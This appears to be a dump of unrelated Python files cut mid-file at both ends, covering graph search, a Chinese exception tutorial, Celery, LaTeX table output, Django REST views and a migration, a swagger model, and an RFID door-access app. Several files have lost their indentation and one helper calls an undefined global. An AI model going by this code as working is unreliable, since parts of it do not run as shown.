        return self

    # O(v+e) time | O(v) space
    def breadthFirstSearch(self, array):
        """Append node names to *array* in breadth-first order and return it.

        Fixes vs. the original: the visited set is local, so repeated calls
        work; the queue is consumed with an index instead of O(n) list.pop(0).
        """
        queue = [self]
        visited = {self}
        head = 0
        while head < len(queue):
            node = queue[head]
            head += 1
            array.append(node.name)
            for child in node.children:
                if child not in visited:
                    visited.add(child)
                    queue.append(child)
        return array
"""
Recursive
"""
|
#程序异常
#常见的异常
"""
NameError :尝试访问一个没有声明的变量引发的错误
IndexError :索引超出序列范围引发的错误
IndentationError :缩进错误
ValueError :传入的值错误
KeyError :请求一个不存在的字典关键字引发错误
IOError :输入输出错误(如果读取文件不存在)
ImportError :当import语句无法找到模块或from无法在模块中找到相应的名称是引发的错误
AttributeError :尝试访问未知的对象属性引发的错误
TypeError :类型不合适引发的错误
MemoryError :内存不足
ZeroDivisionError :除数为0引发的错误
"""
#异常处理语句
"""
try......except捕获异常
如果在except后面不指定异常名称,则表示捕获全部异常
使用try......except语句捕获异常后,当程序出错时,输出错误信息后,程序会继续执行
try.....except...else语句
用于指定当try语句块中没有发生异常时要执行的else语句块,当try语句中的块发生异常时将不会执行else中的语句
try....except....finally语句
完整的异常处理语句,无论程序中有无异常产生,finally代码块中的代码都会被执行
"""
# def division():
# "测试:分苹果"
# print("\n============分苹果了===========\n")
# apple = int(input("请输入苹果的个数:"))
# children = int(input("请输入来了几个小朋友:"))
# result = apple // children
# remain = apple - result * children #剩余的苹果
# if remain > 0:
# print(apple, "个苹果,平均分给", children, "个小朋友,每个人分了", result, "个,剩下", remain, "个。")
# else:
# print(apple, "个苹果,平均分给", children, "个小朋友,每个人分了", result, "个。")
# if __name__ == "__main__":
# try:
# division()
# except ZeroDivisionError:
# print("\n出错了 ~-~ --苹果不能被0个小朋友分!")
# except ValueError as e:
# print("输入错误:", e)
# else:
# print("分苹果顺利完成......")
# finally:
# print("进行了一次分苹果操作")
"""
raise语句抛出异常
如果某个函数或者方法可能会产生异常,但是不想在当前函数或方法中处理异常,则可以使用raise语句抛出异常
语法:
raise[exceptionName(reason)]
exceptionName : 为可选参数,用于指定抛出的异常名称
reason :对异常的相关描述
"""
# def division():
# "测试:分苹果"
# print("\n============分苹果了===========\n")
# apple = int(input("请输入苹果的个数:"))
# children = int(input("请输入来了几个小朋友:"))
# if apple < children:
# raise ValueError("苹果太少,不够分啊........") #使用raise抛出异常
# result = apple // children
# remain = apple - result * children #剩余的苹果
# if remain > 0:
# print(apple, "个苹果,平均分给", children, "个小朋友,每个人分了", result, "个,剩下", remain, "个。")
# else:
# print(apple, "个苹果,平均分给", children, "个小朋友,每个人分了", result, "个。")
# if __name__ == "__main__":
# try:
# division()
# except ZeroDivisionError:
# print("\n出错了 ~-~ --苹果不能被0个小朋友分!")
# except ValueError as e:
# print("输入错误:", e)
# else:
# print("分苹果顺利完成......")
# finally:
# print("进行了一次分苹果操作")
#使用assert语句调试程序 |
# tuples
# parentheses are not required.. but preferred
# NOTE: Python 2 syntax (print statements) — this script will not run under Python 3.
zoo = ('python','elephant','penguin')
print 'Number of animals in the zoo : ',len(zoo)
# Tuples nest: new_zoo's third element is the entire zoo tuple.
new_zoo = 'monkey', 'camel', zoo
print 'Number of animals in new zoo : ',len(new_zoo)
print 'Animals in zoo: ', zoo
print 'Animals in new zoo: ', new_zoo
# zoo
print new_zoo[2]
# Index into the nested tuple: third animal of the original zoo.
print new_zoo[2][2]
|
from celery import Celery
from time import sleep

# Celery application wired to a local RabbitMQ broker; results are returned over AMQP.
app = Celery('tasks',broker='pyamqp://guest@localhost//', backend='amqp')


@app.task
def reverse(text):
    """Return *text* reversed, after a 5-second simulated workload."""
    sleep(5)
    return ''.join(reversed(text))
|
import pandas as pd
import re,sys
def format_data(x):
    """Format one table cell for LaTeX output.

    ints become plain strings, floats are rounded to 4 decimals, and
    strings get '_' escaped as '\\_' (LaTeX subscript character).

    Raises:
        TypeError: for any other type. (The original raised a nonexistent
        ``RuntimeException``, which would surface as a NameError.)
    """
    if isinstance(x, int):
        return str(x)
    if isinstance(x, float):
        return str(round(x, 4))
    if isinstance(x, str):
        return re.sub("_", r"\_", x)
    raise TypeError("Unsupported type to be formatted: %r" % type(x))
def print_table(dfinput,idcolumnIndex, longtable, landscape,selected_columns=None,legend=True):
    """
    Render *dfinput* (optionally restricted to *selected_columns*) as a LaTeX
    table string.

    longtable selects the longtable environment over a resizebox'd tabular;
    landscape wraps the result in a landscape environment; columns with index
    > idcolumnIndex get numbered "(i)" headers; legend appends the standard
    p-value/star footnote. (Original note: everything would repeat if placed
    before an endhead tag.)
    """
    df = dfinput if selected_columns is None else dfinput[selected_columns]
    section = "longtable" if longtable else "tabular"
    colsize = len(df.columns)
    nrows = df.shape[0]
    start = "\\begin{landscape}" if landscape else ""
    if not longtable:
        start += "\\resizebox{\\columnwidth}{!}{"
    # \sym{...} typesets significance stars in math mode; column spec: one 'l' + colsize 'c's.
    start += "\\def\\sym#1{\\ifmmode^{#1}\\else\\(^{#1}\\)\\fi} \\begin{" + section + "}{l*{"+str(colsize)+"}{c}} "
    start += "\\hline\\hline "
    # First header row: "(i)" column numbers (blank for the id columns).
    for i,col in enumerate(df.columns):
        if i>idcolumnIndex:
            start += " & \\multicolumn{1}{c}{("+str(i)+")}"
        else:
            start += " & \\multicolumn{1}{c}{}"
    start += " \\\\"
    # Second header row: actual column names.
    for i,col in enumerate(df.columns):
        if i>idcolumnIndex:
            start += " & \\multicolumn{1}{c}{"+str(col)+"}"
        else:
            start += " & \\multicolumn{1}{c}{}"
    start += "\\\\ \\hline"
    dat = df.to_dict()
    # NOTE(review): dat[col][i] indexes by DataFrame index label — assumes a
    # default 0..n-1 RangeIndex; a filtered/reindexed frame would KeyError. Confirm.
    for i in range(nrows):
        start += "\\\\"
        row = [dat[col][i] for col in df.columns]
        for c in row:
            start += " & " + format_data(c)
    end = ""
    if legend:
        end += "\\\\ \\hline\\hline \\multicolumn{2}{l}{\\footnotesize \\textit{p}-values in parentheses}"
        # NOTE(review): '\sym' below relies on Python leaving the unknown escape
        # '\s' intact — works, but a raw string would be safer. Confirm intent.
        end += "\\\\ \\multicolumn{2}{l}{\\footnotesize \sym{*} \\(p<0.05\\), \\sym{**} \\(p<0.01\\), \\sym{***} \\(p<0.001\\)}"
        end += "\\\\ \\end{" + section + "}"
    if not longtable:
        end += "}"
    if landscape:
        end += "\\end{landscape}"
    return start + end
def has_invalidchars(colname):
    """Raise ValueError if *colname* contains '.' or '_'; return False otherwise.

    The explicit False (previously an implicit None) keeps the falsy contract
    for the caller's any() check while making the intent visible.
    NOTE: because invalid names raise instead of returning True, the caller's
    any() can only ever observe False; validation happens via the exception.
    """
    if set(colname).intersection({'.', '_'}):
        raise ValueError("Invalid character in %s" % colname)
    return False
if __name__ == "__main__":
#df = pd.DataFrame( {'A':[1,2],'B':["GBP","USD"]})
#selected_columns = ['idname','qfruitsveg', 'qVfruitsveg', 'qVprotein', 'qnonfresh',
# 'qcomplements', 'qVcomplements', 'qdensefoods', 'qVdensefoods',
# 'qtransport', 'qVnonfresh', 'qhousehold', 'qenergy', 'qprotein']
#selected_columns = ["idname","qbeef","qbeer","qbread","qbunscakes","qcassavaflour","qcassavafresh","qcharcoal","qcoconut","qcookingoil","qdriedcannedfish","qelectricity","qfishseafood","qfreshmilk","qgreens","qkerosene","qmangoes","qonion","qpeanuts","qpotatoes","qpulses","qricehusked","qsalt","qsugar","qsweetpotato"]
df = pd.read_csv(sys.argv[1],keep_default_na=False)
if any (has_invalidchars(colname) for colname in df.columns):
raise ValueError("Invalid chars")
selected_columns = df.columns
#print(df)
#print(print_table(dfinput=df,idcolumnIndex=0,longtable=False,landscape=False,selected_columns=selected_columns))
print(print_table(dfinput=df,idcolumnIndex=0,longtable=False,landscape=False,selected_columns=selected_columns))
|
import os
import numpy as np
import pandas as pd
import experiments.benchmarks.benchmark as benchmark
class ActivityBenchmark(benchmark.Benchmark):
    """Benchmark that windows activity.csv into fixed-length sensor sequences."""

    def __init__(self):
        # Declares the CLI arguments plus the loss/metric pair used for
        # sparse categorical classification (logits expected).
        super().__init__('activity',
                         (('--sequence_length', 64, int),
                          ('--max_samples', 40_000, int),
                          ('--sample_distance', 4, int),
                          ('--loss_name', 'SparseCategoricalCrossentropy', str),
                          ('--loss_config', {'from_logits': True}, dict),
                          ('--metric_name', 'SparseCategoricalAccuracy', str)))

    def get_data_and_output_size(self):
        """Slide windows over each activity series; return ((sensors, times), (labels,), 7)."""
        sequence_length = self.args.sequence_length
        max_samples = self.args.max_samples
        sample_distance = self.args.sample_distance
        activity_table = pd.read_csv(os.path.join(self.supplementary_data_dir, 'activity.csv'), header=None)
        sensor_inputs = []
        time_inputs = []
        activity_outputs = []
        # Column 0 groups rows into independent series; windows never cross series.
        # assumes within each series: col 1 = time, cols 2-8 = sensors,
        # cols 9+ = activity label for the window's last step — TODO confirm
        for activity_marker in activity_table[0].unique():
            activity_series = activity_table[activity_table[0] == activity_marker].iloc[:, 1:]
            # Overlapping windows, start positions sample_distance apart.
            for start_index in range(0, len(activity_series) - sequence_length + 1, sample_distance):
                current_sequence = np.array(activity_series[start_index:start_index + sequence_length])
                sensor_inputs.append(current_sequence[:, 1:8])
                time_inputs.append(current_sequence[:, :1])
                # Label taken from the final timestep of the window.
                activity_outputs.append(current_sequence[-1, 8:])
        return (np.stack(sensor_inputs)[:max_samples], np.stack(time_inputs)[:max_samples]), (np.stack(activity_outputs)[:max_samples],), 7

# Instantiated at import time — presumably the base class registers/runs the
# benchmark as a side effect of construction; confirm against benchmark.Benchmark.
ActivityBenchmark()
|
# coding: utf-8

# Notebook export: plot world population over time with custom y-tick labels.

# In[1]:

import matplotlib.pyplot as plt

# In[15]:

year = [1950, 1951, 1952,]
pop = [2.538, 2.57, 2.62]

# In[16]:

plt.plot(year, pop)
plt.xlabel('Year')
plt.ylabel('Population')
plt.title('World Population Projections')
plt.yticks([0, 2, 4, 6, 8, 10],
           ['0', '2B', '4B', '6B', '8B', '10B']) # must be same length as first list

# Add more data
# NOTE(review): these extended lists are built after plt.plot(), so the
# pre-1950 points are never drawn — confirm whether plot() should move below.
year = [1800, 1850, 1900] + year
pop = [1.0, 1.262, 1.650] + pop

plt.show()

# In[ ]:
|
from django.db.models import Q
from rest_framework.filters import (
SearchFilter,
OrderingFilter,
)
from rest_framework.generics import (
ListAPIView,
CreateAPIView,
RetrieveAPIView,
)
from rest_framework.mixins import (
DestroyModelMixin,
UpdateModelMixin,
)
from rest_framework.permissions import AllowAny
from posts.api.permissions import IsOwnerOrReadOnly
from posts.api.pagination import PostPageNumberPagination
from ..models import Comment
from .serializers import (
CommentListSerializer,
CommentDetailSerializer,
create_comment_serializer,
)
class CommentCreateAPIView(CreateAPIView):
    """Create a comment (or a reply) on an object identified by query parameters."""

    queryset = Comment.objects.all()
    # permission_classes = [IsAuthenticated]

    def get_serializer_class(self):
        # The target content type, its slug, and an optional parent comment id
        # all arrive as query-string parameters.
        params = self.request.GET
        return create_comment_serializer(
            params.get("type"),
            params.get("slug"),
            params.get("parent_id"),
            user=self.request.user,
        )
class CommentDetailAPIView(DestroyModelMixin, UpdateModelMixin, RetrieveAPIView):
    """Retrieve, update, or delete a single comment.

    Write operations are limited to the comment's owner via IsOwnerOrReadOnly.
    """
    queryset = Comment.objects.filter(id__gte=0)
    serializer_class = CommentDetailSerializer
    permission_classes = [IsOwnerOrReadOnly]

    def put(self, *args, **kwargs):
        # Fixed: delegate to UpdateModelMixin.update via self — the original
        # called a bare, undefined `update(self, ...)` (NameError at runtime).
        return self.update(*args, **kwargs)

    def delete(self, *args, **kwargs):
        # Fixed: delegate to DestroyModelMixin.destroy via self — the original
        # called a bare, undefined `destroy(self, ...)` (NameError at runtime).
        return self.destroy(*args, **kwargs)
class CommentListAPIView(ListAPIView):
    """Paginated comment list with free-text search over content and author names."""

    serializer_class = CommentListSerializer
    filter_backends = [SearchFilter, OrderingFilter]
    search_fields = ['content', 'user__first_name']
    pagination_class = PostPageNumberPagination # PageNumberPagination
    # permission_classes = [AllowAny]

    def get_queryset(self, *args, **kwargs):
        # Start from all comments (id__gte=0 is effectively "all rows").
        queryset_list = Comment.objects.filter(id__gte=0)
        # Optional ?q= filter: match content or author first/last name,
        # deduplicated because the ORs can produce join duplicates.
        query = self.request.GET.get("q")
        if query:
            queryset_list = queryset_list.filter(
                    Q(content__icontains=query) |
                    Q(user__first_name__icontains=query) |
                    Q(user__last_name__icontains=query)
                    ).distinct()
        return queryset_list
|
# Print a star pattern: rows of '*' growing from 1 to N, then shrinking
# back down from N-1 to 1.
N = int(input())
output = ''
for i in range(N):
    output += '*'
    print(output)
for i in range(N - 1):
    output = output[:-1]  # drop one star per row on the way back down
    print(output)  # fixed: stray '~' after 'output' was a syntax error
|
from random import choice

# Draw pool: numbers and letters are both eligible prizes.
lot = [1, 2, 3, 4, 5, 6, 7, 8, 9, 15, "a","z","b","y", "c"]
winner = []
# Keep drawing until four distinct entries have been selected;
# duplicate draws are simply retried.
while len(winner) < 4:
    numero_w = choice(lot)
    if numero_w in winner:
        continue
    print(f"We pulled: {numero_w}")
    winner.append(numero_w)
print(f"The winner is {winner}")
import sys
sys.path.append('..')
from bhbot.models import Command
class AliveCommand(Command):
    """Bot command that answers the 'alive' trigger with a static liveness message."""

    @property
    def triggers(self):
        # Keywords that route an incoming message to this command.
        return ['alive']

    def __call__(self, context: dict) -> str:
        # Reply is static; *context* is accepted only for interface compatibility.
        return 'Yes, I am alive.'
def get_command():
    """Factory hook used by the bot loader to discover this module's command class."""
    return AliveCommand
|
# Generated by Django 3.0.5 on 2020-04-03 08:32
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated: extends PackageSMS.message_type choices (adds 'delivery')
    # and introduces the PrimaryCourier model mapping a sender to one courier.

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('fvh_courier', '0025_auto_20200402_1257'),
    ]

    operations = [
        migrations.AlterField(
            model_name='packagesms',
            name='message_type',
            field=models.PositiveSmallIntegerField(choices=[(0, 'courier_notification'), (1, 'reservation'), (2, 'pickup'), (3, 'delivery')]),
        ),
        migrations.CreateModel(
            name='PrimaryCourier',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # One courier can be primary for many senders; each sender has
                # exactly one primary courier (OneToOneField on sender).
                ('courier', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='is_primary_courier_for', to=settings.AUTH_USER_MODEL)),
                ('sender', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='primary_courier', to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
# coding: utf-8
"""
Cyclos 4.11.5 API
The REST API for Cyclos 4.11.5 # noqa: E501
OpenAPI spec version: 4.11.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from swagger_client.configuration import Configuration
class BaseTransQueryFilters(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'date_period': 'list[datetime]',
'transfer_filters': 'list[str]',
'transfer_types': 'list[str]',
'transaction_number': 'str',
'user': 'str',
'groups': 'list[str]',
'by': 'str',
'broker': 'str',
'channels': 'list[str]',
'excluded_ids': 'list[str]',
'access_clients': 'list[str]',
'include_generated_by_access_client': 'bool',
'from_current_access_client': 'bool',
'amount_range': 'list[BigDecimal]'
}
attribute_map = {
'date_period': 'datePeriod',
'transfer_filters': 'transferFilters',
'transfer_types': 'transferTypes',
'transaction_number': 'transactionNumber',
'user': 'user',
'groups': 'groups',
'by': 'by',
'broker': 'broker',
'channels': 'channels',
'excluded_ids': 'excludedIds',
'access_clients': 'accessClients',
'include_generated_by_access_client': 'includeGeneratedByAccessClient',
'from_current_access_client': 'fromCurrentAccessClient',
'amount_range': 'amountRange'
}
def __init__(self, date_period=None, transfer_filters=None, transfer_types=None, transaction_number=None, user=None, groups=None, by=None, broker=None, channels=None, excluded_ids=None, access_clients=None, include_generated_by_access_client=None, from_current_access_client=None, amount_range=None, _configuration=None): # noqa: E501
"""BaseTransQueryFilters - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._date_period = None
self._transfer_filters = None
self._transfer_types = None
self._transaction_number = None
self._user = None
self._groups = None
self._by = None
self._broker = None
self._channels = None
self._excluded_ids = None
self._access_clients = None
self._include_generated_by_access_client = None
self._from_current_access_client = None
self._amount_range = None
self.discriminator = None
if date_period is not None:
self.date_period = date_period
if transfer_filters is not None:
self.transfer_filters = transfer_filters
if transfer_types is not None:
self.transfer_types = transfer_types
if transaction_number is not None:
self.transaction_number = transaction_number
if user is not None:
self.user = user
if groups is not None:
self.groups = groups
if by is not None:
self.by = by
if broker is not None:
self.broker = broker
if channels is not None:
self.channels = channels
if excluded_ids is not None:
self.excluded_ids = excluded_ids
if access_clients is not None:
self.access_clients = access_clients
if include_generated_by_access_client is not None:
self.include_generated_by_access_client = include_generated_by_access_client
if from_current_access_client is not None:
self.from_current_access_client = from_current_access_client
if amount_range is not None:
self.amount_range = amount_range
@property
def date_period(self):
"""Gets the date_period of this BaseTransQueryFilters. # noqa: E501
The minimum / maximum transfer date. Is expressed an array, with the lower bound as first element, and the upper bound as second element. When only one element, will have just the lower bound. To specify only the upper bound, prefix the value with a comma. # noqa: E501
:return: The date_period of this BaseTransQueryFilters. # noqa: E501
:rtype: list[datetime]
"""
return self._date_period
@date_period.setter
def date_period(self, date_period):
"""Sets the date_period of this BaseTransQueryFilters.
The minimum / maximum transfer date. Is expressed an array, with the lower bound as first element, and the upper bound as second element. When only one element, will have just the lower bound. To specify only the upper bound, prefix the value with a comma. # noqa: E501
:param date_period: The date_period of this BaseTransQueryFilters. # noqa: E501
:type: list[datetime]
"""
self._date_period = date_period
@property
def transfer_filters(self):
"""Gets the transfer_filters of this BaseTransQueryFilters. # noqa: E501
Reference to the transfer filters, which filters transfers by type. May be either the internal id or qualified transfer filter internal name, in the format `accountType.transferFilter`. # noqa: E501
:return: The transfer_filters of this BaseTransQueryFilters. # noqa: E501
:rtype: list[str]
"""
return self._transfer_filters
@transfer_filters.setter
def transfer_filters(self, transfer_filters):
"""Sets the transfer_filters of this BaseTransQueryFilters.
Reference to the transfer filters, which filters transfers by type. May be either the internal id or qualified transfer filter internal name, in the format `accountType.transferFilter`. # noqa: E501
:param transfer_filters: The transfer_filters of this BaseTransQueryFilters. # noqa: E501
:type: list[str]
"""
self._transfer_filters = transfer_filters
@property
def transfer_types(self):
"""Gets the transfer_types of this BaseTransQueryFilters. # noqa: E501
Reference to the transfer types for filter. May be either the internal id or qualified transfer type internal name, in the format `accountType.transferType`. # noqa: E501
:return: The transfer_types of this BaseTransQueryFilters. # noqa: E501
:rtype: list[str]
"""
return self._transfer_types
@transfer_types.setter
def transfer_types(self, transfer_types):
"""Sets the transfer_types of this BaseTransQueryFilters.
Reference to the transfer types for filter. May be either the internal id or qualified transfer type internal name, in the format `accountType.transferType`. # noqa: E501
:param transfer_types: The transfer_types of this BaseTransQueryFilters. # noqa: E501
:type: list[str]
"""
self._transfer_types = transfer_types
@property
def transaction_number(self):
"""Gets the transaction_number of this BaseTransQueryFilters. # noqa: E501
The transaction number of the matching transfer # noqa: E501
:return: The transaction_number of this BaseTransQueryFilters. # noqa: E501
:rtype: str
"""
return self._transaction_number
@transaction_number.setter
def transaction_number(self, transaction_number):
"""Sets the transaction_number of this BaseTransQueryFilters.
The transaction number of the matching transfer # noqa: E501
:param transaction_number: The transaction_number of this BaseTransQueryFilters. # noqa: E501
:type: str
"""
self._transaction_number = transaction_number
@property
def user(self):
"""Gets the user of this BaseTransQueryFilters. # noqa: E501
Reference a user that should have either received / performed the transfer. # noqa: E501
:return: The user of this BaseTransQueryFilters. # noqa: E501
:rtype: str
"""
return self._user
@user.setter
def user(self, user):
"""Sets the user of this BaseTransQueryFilters.
Reference a user that should have either received / performed the transfer. # noqa: E501
:param user: The user of this BaseTransQueryFilters. # noqa: E501
:type: str
"""
self._user = user
@property
def groups(self):
"""Gets the groups of this BaseTransQueryFilters. # noqa: E501
Reference to the user group used to perform / receive the transfer. Only taken into account if authenticated as administrator. # noqa: E501
:return: The groups of this BaseTransQueryFilters. # noqa: E501
:rtype: list[str]
"""
return self._groups
@groups.setter
def groups(self, groups):
"""Sets the groups of this BaseTransQueryFilters.
Reference to the user group used to perform / receive the transfer. Only taken into account if authenticated as administrator. # noqa: E501
:param groups: The groups of this BaseTransQueryFilters. # noqa: E501
:type: list[str]
"""
self._groups = groups
@property
def by(self):
"""Gets the by of this BaseTransQueryFilters. # noqa: E501
Reference to the user that was authenticated when the transfer was performed. Is only taken into account if authenticated as administrator. # noqa: E501
:return: The by of this BaseTransQueryFilters. # noqa: E501
:rtype: str
"""
return self._by
@by.setter
def by(self, by):
"""Sets the by of this BaseTransQueryFilters.
Reference to the user that was authenticated when the transfer was performed. Is only taken into account if authenticated as administrator. # noqa: E501
:param by: The by of this BaseTransQueryFilters. # noqa: E501
:type: str
"""
self._by = by
@property
def broker(self):
"""Gets the broker of this BaseTransQueryFilters. # noqa: E501
Reference to the broker of users involved in transfers. Is only taken into account if authenticated as administrator. # noqa: E501
:return: The broker of this BaseTransQueryFilters. # noqa: E501
:rtype: str
"""
return self._broker
@broker.setter
def broker(self, broker):
"""Sets the broker of this BaseTransQueryFilters.
Reference to the broker of users involved in transfers. Is only taken into account if authenticated as administrator. # noqa: E501
:param broker: The broker of this BaseTransQueryFilters. # noqa: E501
:type: str
"""
self._broker = broker
@property
def channels(self):
"""Gets the channels of this BaseTransQueryFilters. # noqa: E501
Reference to the channel used to perform / receive the transfer. Only taken into account if authenticated as administrator. # noqa: E501
:return: The channels of this BaseTransQueryFilters. # noqa: E501
:rtype: list[str]
"""
return self._channels
@channels.setter
def channels(self, channels):
"""Sets the channels of this BaseTransQueryFilters.
Reference to the channel used to perform / receive the transfer. Only taken into account if authenticated as administrator. # noqa: E501
:param channels: The channels of this BaseTransQueryFilters. # noqa: E501
:type: list[str]
"""
self._channels = channels
@property
def excluded_ids(self):
"""Gets the excluded_ids of this BaseTransQueryFilters. # noqa: E501
List of transfers ids to be excluded from the result. # noqa: E501
:return: The excluded_ids of this BaseTransQueryFilters. # noqa: E501
:rtype: list[str]
"""
return self._excluded_ids
@excluded_ids.setter
def excluded_ids(self, excluded_ids):
"""Sets the excluded_ids of this BaseTransQueryFilters.
List of transfers ids to be excluded from the result. # noqa: E501
:param excluded_ids: The excluded_ids of this BaseTransQueryFilters. # noqa: E501
:type: list[str]
"""
self._excluded_ids = excluded_ids
@property
def access_clients(self):
"""Gets the access_clients of this BaseTransQueryFilters. # noqa: E501
References to access clients (id or token) used to perform / receive the transfer. # noqa: E501
:return: The access_clients of this BaseTransQueryFilters. # noqa: E501
:rtype: list[str]
"""
return self._access_clients
@access_clients.setter
def access_clients(self, access_clients):
"""Sets the access_clients of this BaseTransQueryFilters.
References to access clients (id or token) used to perform / receive the transfer. # noqa: E501
:param access_clients: The access_clients of this BaseTransQueryFilters. # noqa: E501
:type: list[str]
"""
self._access_clients = access_clients
@property
def include_generated_by_access_client(self):
"""Gets the include_generated_by_access_client of this BaseTransQueryFilters. # noqa: E501
Flag indicating whether to include or not the generated transfer. Only valid if there is at least one access client specified. For example if a `ticket` or `paymentRequest` was processed then a new transfer will be generated. # noqa: E501
:return: The include_generated_by_access_client of this BaseTransQueryFilters. # noqa: E501
:rtype: bool
"""
return self._include_generated_by_access_client
@include_generated_by_access_client.setter
def include_generated_by_access_client(self, include_generated_by_access_client):
"""Sets the include_generated_by_access_client of this BaseTransQueryFilters.
Flag indicating whether to include or not the generated transfer. Only valid if there is at least one access client specified. For example if a `ticket` or `paymentRequest` was processed then a new transfer will be generated. # noqa: E501
:param include_generated_by_access_client: The include_generated_by_access_client of this BaseTransQueryFilters. # noqa: E501
:type: bool
"""
self._include_generated_by_access_client = include_generated_by_access_client
@property
def from_current_access_client(self):
"""Gets the from_current_access_client of this BaseTransQueryFilters. # noqa: E501
Flag indicating whether to include only transfers by the current access client. # noqa: E501
:return: The from_current_access_client of this BaseTransQueryFilters. # noqa: E501
:rtype: bool
"""
return self._from_current_access_client
@from_current_access_client.setter
def from_current_access_client(self, from_current_access_client):
"""Sets the from_current_access_client of this BaseTransQueryFilters.
Flag indicating whether to include only transfers by the current access client. # noqa: E501
:param from_current_access_client: The from_current_access_client of this BaseTransQueryFilters. # noqa: E501
:type: bool
"""
self._from_current_access_client = from_current_access_client
@property
def amount_range(self):
"""Gets the amount_range of this BaseTransQueryFilters. # noqa: E501
The minimum / maximum amount. Is expressed an array, with the lower bound as first element, and the upper bound as second element. When only one element, will have just the lower bound. To specify only the upper bound, prefix the value with a comma. # noqa: E501
:return: The amount_range of this BaseTransQueryFilters. # noqa: E501
:rtype: list[BigDecimal]
"""
return self._amount_range
@amount_range.setter
def amount_range(self, amount_range):
"""Sets the amount_range of this BaseTransQueryFilters.
The minimum / maximum amount. Is expressed an array, with the lower bound as first element, and the upper bound as second element. When only one element, will have just the lower bound. To specify only the upper bound, prefix the value with a comma. # noqa: E501
:param amount_range: The amount_range of this BaseTransQueryFilters. # noqa: E501
:type: list[BigDecimal]
"""
self._amount_range = amount_range
def to_dict(self):
    """Serialize the model's declared swagger attributes into a plain dict.

    Nested models (anything exposing ``to_dict``) are serialized
    recursively, both inside lists and inside dict values.
    """
    def _convert(element):
        # Recurse into nested swagger models, pass plain values through.
        return element.to_dict() if hasattr(element, "to_dict") else element

    serialized = {}
    for attr_name, _ in six.iteritems(self.swagger_types):
        attr_value = getattr(self, attr_name)
        if isinstance(attr_value, list):
            serialized[attr_name] = [_convert(element) for element in attr_value]
        elif hasattr(attr_value, "to_dict"):
            serialized[attr_name] = attr_value.to_dict()
        elif isinstance(attr_value, dict):
            serialized[attr_name] = {
                key: _convert(val) for key, val in attr_value.items()
            }
        else:
            serialized[attr_name] = attr_value
    # Swagger models may subclass dict; fold any extra dict entries in too.
    if issubclass(BaseTransQueryFilters, dict):
        for key, value in self.items():
            serialized[key] = value
    return serialized
def to_str(self):
    """Returns the string representation of the model"""
    # Pretty-print the serialized dict form for readable debug output.
    return pprint.pformat(self.to_dict())
def __repr__(self):
    """For `print` and `pprint`"""
    # Delegates to to_str() so repr() and str() stay consistent.
    return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, BaseTransQueryFilters):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, BaseTransQueryFilters):
return True
return self.to_dict() != other.to_dict()
|
"""
Created on Jan 25, 2018
@author: Siyuan Qi
Description of the file.
"""
from . import grammarutils
from .generalizedearley import GeneralizedEarley
__all__ = ('grammarutils', 'GeneralizedEarley') |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys, os
from TouchStyle import *
import MFRC522
import ftrobopy
# the output ports (indices passed to txt.setPwm)
GREEN = 0   # lamp lit on access granted ("ok" state)
RED = 2     # lamp lit on access denied ("nok" state)
MOTOR = 4   # door motor: MOTOR opens, MOTOR+1 closes

# This is the default key for authentication (factory default MIFARE key)
KEY = [0xFF,0xFF,0xFF,0xFF,0xFF,0xFF]
def dummy_reader():
    """One-shot test routine: detect a card, authenticate and read block 8.

    NOTE(review): relies on a module-level ``MIFAREReader`` which is never
    defined at module scope in this file (the application keeps the reader
    on ``self.MIFAREReader``) -- calling this as-is raises NameError.
    Appears to be leftover demo code; confirm before removing.
    """
    # Scan for cards
    (status, TagType) = MIFAREReader.MFRC522_Request(MIFAREReader.PICC_REQIDL)

    # If a card is found
    if status == MIFAREReader.MI_OK:
        print("Card detected")

        # Get the UID of the card
        (status, uid) = MIFAREReader.MFRC522_Anticoll()

        # If we have the UID, continue
        if status == MIFAREReader.MI_OK:
            # Print UID
            print("Card read UID: "+str(uid[0])+","+str(uid[1])+","+str(uid[2])+","+str(uid[3]))

            # Select the scanned tag
            MIFAREReader.MFRC522_SelectTag(uid)

            # Authenticate (block 8, factory default key)
            status = MIFAREReader.MFRC522_Auth(MIFAREReader.PICC_AUTHENT1A, 8, KEY, uid)

            # Check if authenticated
            if status == MIFAREReader.MI_OK:
                MIFAREReader.MFRC522_Read(8)
                MIFAREReader.MFRC522_StopCrypto1()
            else:
                print("Authentication error")
class SetupDialog(TouchDialog):
    """Modal dialog that writes a card holder's name and an access flag
    onto block 8 of a MIFARE card held in front of the RC522 reader.

    Byte 0 of block 8 becomes 0x42 when the "enable" checkbox is ticked;
    bytes 1..15 hold the (max 15 char) name. The dialog polls the reader
    every 100 ms and closes itself after a successful write.
    """

    def __init__(self, reader, parent):
        TouchDialog.__init__(self, "Setup", parent)

        vbox = QVBoxLayout()
        vbox.addStretch()
        self.MIFAREReader = reader

        # name entry (limited to the 15 bytes available in the block)
        lbl = QLabel(QCoreApplication.translate("setup", "Name:"))
        lbl.setObjectName("smalllabel")
        vbox.addWidget(lbl)
        self.name = QLineEdit("")
        self.name.setMaxLength(15)
        vbox.addWidget(self.name)

        vbox.addStretch()

        # permission checkbox -> access-token byte
        lbl = QLabel(QCoreApplication.translate("setup", "Permission:"))
        lbl.setObjectName("smalllabel")
        vbox.addWidget(lbl)
        self.check = QCheckBox(QCoreApplication.translate("setup", "enable"))
        vbox.addWidget(self.check)

        vbox.addStretch()

        lbl = QLabel(QCoreApplication.translate("setup",
                     "Place card in front of reader to write data."))
        lbl.setObjectName("tinylabel")
